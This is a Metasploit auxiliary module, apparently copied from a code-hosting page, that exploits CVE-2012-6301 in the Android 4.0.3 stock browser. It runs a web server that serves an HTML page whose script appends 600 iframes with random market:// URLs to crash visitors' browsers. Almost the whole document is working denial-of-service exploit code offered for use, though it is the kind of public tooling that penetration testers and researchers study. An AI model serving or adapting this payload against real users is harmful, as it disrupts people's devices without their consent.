Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpServer
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name'           => "Android Stock Browser Iframe DOS",
14
        'Description'    => %q(
15
          This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
16
          If successful, the browser will crash after viewing the webpage.
17
        ),
18
        'License'        => MSF_LICENSE,
19
        'Author'         => [
20
          'Jean Pascal Pereira',  # Original exploit discovery
21
          'Jonathan Waggoner'     # Metasploit module
22
        ],
23
        'References'     => [
24
          [ 'PACKETSTORM', '118539'],
25
          [ 'CVE', '2012-6301' ]
26
        ],
27
        'DisclosureDate' => '2012-12-01',
28
        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
29
        'PassiveActions' => [ 'WebServer' ],
30
        'DefaultAction'  => 'WebServer'
31
      )
32
    )
33
  end
34

35
  def run
36
    exploit # start http server
37
  end
38

39
  def setup
40
    @html = %|
41
    <html>
42
    <body>
43
    <script type="text/javascript">
44
      for (var i = 0; i < 600; i++)
45
      {
46
        var m_frame = document.createElement("iframe");
47
        m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");
48
        document.body.appendChild(m_frame);
49
      }
50
    </script>
51
    </body>
52
    </html>
53
    |
54
  end
55

56
  def on_request_uri(cli, _request)
57
    print_status('Sending response')
58
    send_response(cli, @html)
59
  end
60
end
61

62